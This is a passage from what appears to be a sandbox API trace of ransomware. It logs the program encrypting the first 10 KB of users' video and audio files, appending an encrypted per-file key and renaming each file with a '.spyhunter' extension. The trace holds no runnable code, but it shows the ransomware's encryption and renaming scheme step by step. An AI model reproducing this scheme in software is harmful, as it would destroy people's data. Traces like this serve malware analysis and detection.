0x2c375d8 [0147.510] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ced7c*=0x2800, lpOverlapped=0x0) returned 1 [0147.510] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.511] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ced7c*=0x2800, lpOverlapped=0x0) returned 1 [0147.549] GetProcessHeap () returned 0x2c0000 [0147.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.549] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.549] WriteFile (in: hFile=0xa0, lpBuffer=0x25cedbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced7c, lpOverlapped=0x0 | out: lpBuffer=0x25cedbc*, lpNumberOfBytesWritten=0x25ced7c*=0x4, lpOverlapped=0x0) returned 1 [0147.549] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced7c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced7c*=0x30, lpOverlapped=0x0) returned 1 [0147.550] CloseHandle (hObject=0xa0) returned 1 [0147.550] GetProcessHeap () returned 0x2c0000 [0147.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.550] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\dJ2Dgg.mp4.spyhunter") returned 96 [0147.550] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\dJ2Dgg.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\d2to6yv_dz9 8f\\dj2dgg.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\dJ2Dgg.mp4.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\d2to6yv_dz9 8f\\dj2dgg.mp4.spyhunter")) returned 1 [0147.551] GetProcessHeap () returned 0x2c0000 [0147.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.551] GetProcessHeap () returned 0x2c0000 [0147.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.551] GetProcessHeap () returned 0x2c0000 [0147.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3a588 | out: hHeap=0x2c0000) returned 1 [0147.551] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cedb8 | out: pbBuffer=0x25cedb8) returned 1 [0147.551] GetProcessHeap () returned 0x2c0000 [0147.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.551] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cedb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cedb0*=0x30) returned 1 [0147.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\pJMVe5TY\\C7uDu.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2lq9alknqdsjidvkq\\pjmve5ty\\c7udu.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.552] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\pJMVe5TY\\C7uDu.flv") returned 77 [0147.552] StrStrW (lpFirst="C7uDu.flv", lpSrch=".txt") returned 0x0 [0147.552] GetProcessHeap () returned 0x2c0000 [0147.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.552] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ced74*=0x2800, lpOverlapped=0x0) returned 1 [0147.553] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.553] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ced74*=0x2800, lpOverlapped=0x0) returned 1 [0147.553] GetProcessHeap () returned 0x2c0000 [0147.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.553] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.553] WriteFile (in: hFile=0xa0, lpBuffer=0x25cedb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced74, lpOverlapped=0x0 | out: lpBuffer=0x25cedb4*, lpNumberOfBytesWritten=0x25ced74*=0x4, lpOverlapped=0x0) returned 1 [0147.554] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced74, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced74*=0x30, lpOverlapped=0x0) returned 1 [0147.554] CloseHandle (hObject=0xa0) returned 1 [0147.713] GetProcessHeap () returned 0x2c0000 [0147.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.714] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\pJMVe5TY\\C7uDu.flv.spyhunter") returned 87 [0147.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\pJMVe5TY\\C7uDu.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2lq9alknqdsjidvkq\\pjmve5ty\\c7udu.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\pJMVe5TY\\C7uDu.flv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2lq9alknqdsjidvkq\\pjmve5ty\\c7udu.flv.spyhunter")) returned 1 [0147.858] GetProcessHeap () returned 0x2c0000 [0147.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.858] GetProcessHeap () returned 0x2c0000 [0147.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.858] GetProcessHeap () returned 0x2c0000 [0147.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2fb28 | out: hHeap=0x2c0000) returned 1 [0147.858] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cedb8 | out: pbBuffer=0x25cedb8) returned 1 [0147.858] GetProcessHeap () returned 0x2c0000 [0147.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.859] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cedb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cedb0*=0x30) returned 1 [0147.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dLfGdUPqaP8PYhH3R.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dlfgdupqap8pyhh3r.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0147.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dLfGdUPqaP8PYhH3R.m4a") returned 61 [0147.859] StrStrW (lpFirst="dLfGdUPqaP8PYhH3R.m4a", lpSrch=".txt") returned 0x0 [0147.859] GetProcessHeap () returned 0x2c0000 [0147.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.859] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ced74*=0x2800, lpOverlapped=0x0) returned 1 [0147.860] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.860] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ced74*=0x2800, lpOverlapped=0x0) returned 1 [0147.860] GetProcessHeap () returned 0x2c0000 [0147.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.860] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.860] WriteFile (in: hFile=0x9c, lpBuffer=0x25cedb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced74, lpOverlapped=0x0 | out: lpBuffer=0x25cedb4*, lpNumberOfBytesWritten=0x25ced74*=0x4, lpOverlapped=0x0) returned 1 [0147.860] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced74, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced74*=0x30, lpOverlapped=0x0) returned 1 [0147.860] CloseHandle (hObject=0x9c) returned 1 [0147.977] GetProcessHeap () returned 0x2c0000 [0147.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.977] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dLfGdUPqaP8PYhH3R.m4a.spyhunter") returned 71 [0147.977] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dLfGdUPqaP8PYhH3R.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dlfgdupqap8pyhh3r.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dLfGdUPqaP8PYhH3R.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dlfgdupqap8pyhh3r.m4a.spyhunter")) returned 1 [0148.069] GetProcessHeap () returned 0x2c0000 [0148.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0148.069] GetProcessHeap () returned 0x2c0000 [0148.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0148.069] GetProcessHeap () returned 0x2c0000 [0148.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302f278 | out: hHeap=0x2c0000) returned 1 [0148.069] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cedb0 | out: pbBuffer=0x25cedb0) returned 1 [0148.069] GetProcessHeap () returned 0x2c0000 [0148.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0148.070] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ceda8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ceda8*=0x30) returned 1 [0148.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\4nJrUzSRnVEnY.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\4njruzsrnveny.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.070] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\4nJrUzSRnVEnY.wav") returned 64 [0148.070] StrStrW (lpFirst="4nJrUzSRnVEnY.wav", lpSrch=".txt") returned 0x0 [0148.070] GetProcessHeap () returned 0x2c0000 [0148.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.070] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ced6c*=0x2800, lpOverlapped=0x0) returned 1 [0148.071] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.071] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ced6c*=0x2800, lpOverlapped=0x0) returned 1 [0148.071] GetProcessHeap () returned 0x2c0000 [0148.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.071] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.071] WriteFile (in: hFile=0x9c, lpBuffer=0x25cedac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced6c, lpOverlapped=0x0 | out: lpBuffer=0x25cedac*, lpNumberOfBytesWritten=0x25ced6c*=0x4, lpOverlapped=0x0) returned 1 [0148.071] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced6c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced6c*=0x30, lpOverlapped=0x0) returned 1 [0148.071] CloseHandle (hObject=0x9c) returned 1 [0148.190] GetProcessHeap () returned 0x2c0000 [0148.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0148.190] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\4nJrUzSRnVEnY.wav.spyhunter") returned 74 [0148.190] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\4nJrUzSRnVEnY.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\4njruzsrnveny.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\4nJrUzSRnVEnY.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\4njruzsrnveny.wav.spyhunter")) returned 1 [0148.191] GetProcessHeap () returned 0x2c0000 [0148.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0148.192] GetProcessHeap () returned 0x2c0000 [0148.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0148.192] GetProcessHeap () returned 0x2c0000 [0148.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef6048 | out: hHeap=0x2c0000) returned 1 [0148.192] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cedb0 | out: pbBuffer=0x25cedb0) returned 1 [0148.192] GetProcessHeap () returned 0x2c0000 [0148.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0148.192] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ceda8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ceda8*=0x30) returned 1 [0148.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\0myw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\0myw.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.193] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\0myw.m4a") returned 55 [0148.193] StrStrW (lpFirst="0myw.m4a", lpSrch=".txt") returned 0x0 [0148.193] GetProcessHeap () returned 0x2c0000 [0148.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.193] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ced6c*=0x2800, lpOverlapped=0x0) returned 1 [0148.194] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.194] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ced6c*=0x2800, lpOverlapped=0x0) returned 1 [0148.194] GetProcessHeap () returned 0x2c0000 [0148.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.194] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.194] WriteFile (in: hFile=0x9c, lpBuffer=0x25cedac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced6c, lpOverlapped=0x0 | out: lpBuffer=0x25cedac*, lpNumberOfBytesWritten=0x25ced6c*=0x4, lpOverlapped=0x0) returned 1 [0148.194] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced6c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced6c*=0x30, lpOverlapped=0x0) returned 1 [0148.194] CloseHandle (hObject=0x9c) returned 1 [0148.195] GetProcessHeap () returned 0x2c0000 [0148.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0148.195] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\0myw.m4a.spyhunter") returned 65 [0148.195] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\0myw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\0myw.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\0myw.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\0myw.m4a.spyhunter")) returned 1 [0148.195] GetProcessHeap () returned 0x2c0000 [0148.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0148.196] GetProcessHeap () returned 0x2c0000 [0148.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0148.196] GetProcessHeap () returned 0x2c0000 [0148.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a25b0 | out: hHeap=0x2c0000) returned 1 [0148.196] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceda8 | out: pbBuffer=0x25ceda8) returned 1 [0148.196] GetProcessHeap () returned 0x2c0000 [0148.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0148.196] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ceda0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ceda0*=0x30) returned 1 [0148.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\85_WZm5A.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\85_wzm5a.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.196] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\85_WZm5A.m4a") returned 52 [0148.196] StrStrW (lpFirst="85_WZm5A.m4a", lpSrch=".txt") returned 0x0 [0148.196] GetProcessHeap () returned 0x2c0000 [0148.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.197] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ced64*=0x2800, lpOverlapped=0x0) returned 1 [0148.198] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.198] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ced64*=0x2800, lpOverlapped=0x0) returned 1 [0148.198] GetProcessHeap () returned 0x2c0000 [0148.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.198] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.198] WriteFile (in: hFile=0x9c, lpBuffer=0x25ceda4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced64, lpOverlapped=0x0 | out: lpBuffer=0x25ceda4*, lpNumberOfBytesWritten=0x25ced64*=0x4, lpOverlapped=0x0) returned 1 [0148.198] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced64, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced64*=0x30, lpOverlapped=0x0) returned 1 [0148.198] CloseHandle (hObject=0x9c) returned 1 [0148.198] GetProcessHeap () returned 0x2c0000 [0148.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0148.198] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\85_WZm5A.m4a.spyhunter") returned 62 [0148.198] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\85_WZm5A.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\85_wzm5a.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\85_WZm5A.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\85_wzm5a.m4a.spyhunter")) returned 1 [0148.199] GetProcessHeap () returned 0x2c0000 [0148.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0148.199] GetProcessHeap () returned 0x2c0000 [0148.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0148.199] GetProcessHeap () returned 0x2c0000 [0148.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a24f8 | out: hHeap=0x2c0000) returned 1 [0148.199] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceda8 | out: pbBuffer=0x25ceda8) returned 1 [0148.199] GetProcessHeap () returned 0x2c0000 [0148.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0148.199] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ceda0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ceda0*=0x30) returned 1 [0148.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6ZMYgDhyPmM.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6zmygdhypmm.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.200] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6ZMYgDhyPmM.wav") returned 55 [0148.200] StrStrW (lpFirst="6ZMYgDhyPmM.wav", lpSrch=".txt") returned 0x0 [0148.200] GetProcessHeap () returned 0x2c0000 [0148.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.200] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ced64*=0x2800, lpOverlapped=0x0) returned 1 [0148.201] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.201] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, 